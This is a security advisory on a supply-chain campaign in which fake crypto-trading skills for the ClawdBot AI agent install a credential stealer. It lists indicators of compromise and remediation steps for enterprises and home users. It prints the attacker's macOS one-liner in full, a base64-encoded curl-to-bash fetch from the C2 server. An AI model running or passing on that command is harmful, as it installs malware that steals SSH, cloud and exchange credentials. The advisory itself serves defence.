Technical Analysis & Remediation
Attack Vector & Tactics (MITRE ATT&CK)
T1195.001
(Supply Chain Compromise) Poisoned open-source skills masquerading as crypto trading bots (e.g., polymarket-trading-bot, binance-agent).
T1204.002
(User Execution: Malicious File) Users are instructed to download and run AuthTool.zip (Windows) or execute a terminal command (macOS) to "authenticate" the skill.
T1059.004
(Command and Scripting Interpreter: Unix Shell) macOS payloads use curl piped to bash to fetch the second stage.
Live Evidence Extraction
C2 Infrastructure
IP: 91[.]92[.]242[.]30
Payload URL (Decoded) hxxps://91[.]92[.]242[.]30/6dec0ptkp49uugo
File Indicators (SHA-256)
macOS Payload (db2w5j5bka6qkxi) 998c38dc30097479bd15a68d9435dc5b98681419739572cadfe1e08581187e
Windows Payload
AuthTool.exe (contained in zip with password 1234)
Malicious Accounts (ClawHub/GitHub)
hightower6eu (Primary, 354 skills)
jordanprater, zaycv, aslaep123, danman0, lvy19811120-gif, gtaiai.
macOS Kill Chain Snippet
The attack uses a fake Apple URL echo to build trust, followed by a base64 encoded execution:
Bash:
echo "macOS-Installer: <https://swcdn.apple.com/...>" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgPGh0dHBzOi8vOTEuOTIuMjQyLjMwLzZkZWMwcHRrcDQ5dXVnbz4pIg==' | base64 -D | bash
Remediation - THE ENTERPRISE TRACK (SANS PICERL)
Phase 1: Identification & Containment
Network Block
Immediately block outbound traffic to 91[.]92[.]242[.]30 at the perimeter firewalls and DNS resolvers.
Inventory Scan
Query endpoints for the existence of ClawdBot instances and specifically scan for the presence of the directory ~/.clawdbot/skills containing metadata from the listed malicious authors.
Process Termination
Hunt for and terminate processes related to AuthTool.exe or suspicious curl | bash parents.
Phase 2: Eradication
File Removal
Delete the binary db2w5j5bka6qkxi (macOS) and AuthTool.exe (Windows).
Credential Rotation
CRITICAL. The malware specifically targets Exchange API keys (env vars/config files), SSH keys (~/.ssh), and AWS/Cloud credentials (.aws/credentials). Force rotation of all potentially exposed secrets.
Phase 3: Recovery
Re-imaging
Due to the stealer's potential to establish persistence (not fully detailed but likely given the access level), re-imaging affected developer workstations is recommended.
Validation
Verify clean ClawdBot installations only from verified sources (though even official repos show signs of slow moderation).
Phase 4: Lessons Learned
Policy Update
Ban the use of "ClawdBot" or similar AI agents that execute local code until an approved software list (ASL) governance model is applied.
Detection
Implement SIEM rules for xattr -c followed by chmod +x execution sequences in user temp directories.
Remediation - THE HOME USER TRACK
Priority 1
Safety (Stop the Bleeding)
Disconnect your device from the internet immediately.
If you ran a command starting with echo "macOS-Installer... or downloaded AuthTool.zip, you are compromised.
Priority 2: Identity (The "Ganked" Check)
Use a clean, separate device (like your phone) to change passwords.
Crypto
Revoke all API keys on exchanges (ByBit, Polymarket, etc.) immediately. Transfer funds from potentially compromised hot wallets to a new cold wallet.
Accounts
Reset passwords for Reddit, LinkedIn, and email accounts.
Priority 3: Cleanup
Delete the malicious skill folders from your ClawdBot directory.
Run a reputable antivirus scan specifically looking for the hash 998c38dc30097479bd15a68d9435dc5b98681419739572cadfe1e08581187e.
Hardening & References
Baseline
Restrict local AI agents from accessing sensitive directories (.ssh, .aws, .env) via containerization (Docker) or sandbox policies.
Tactical
Monitor for the creation of files matching the pattern macos-stealer-v2-*.
Sources
OpenSource Malware Blog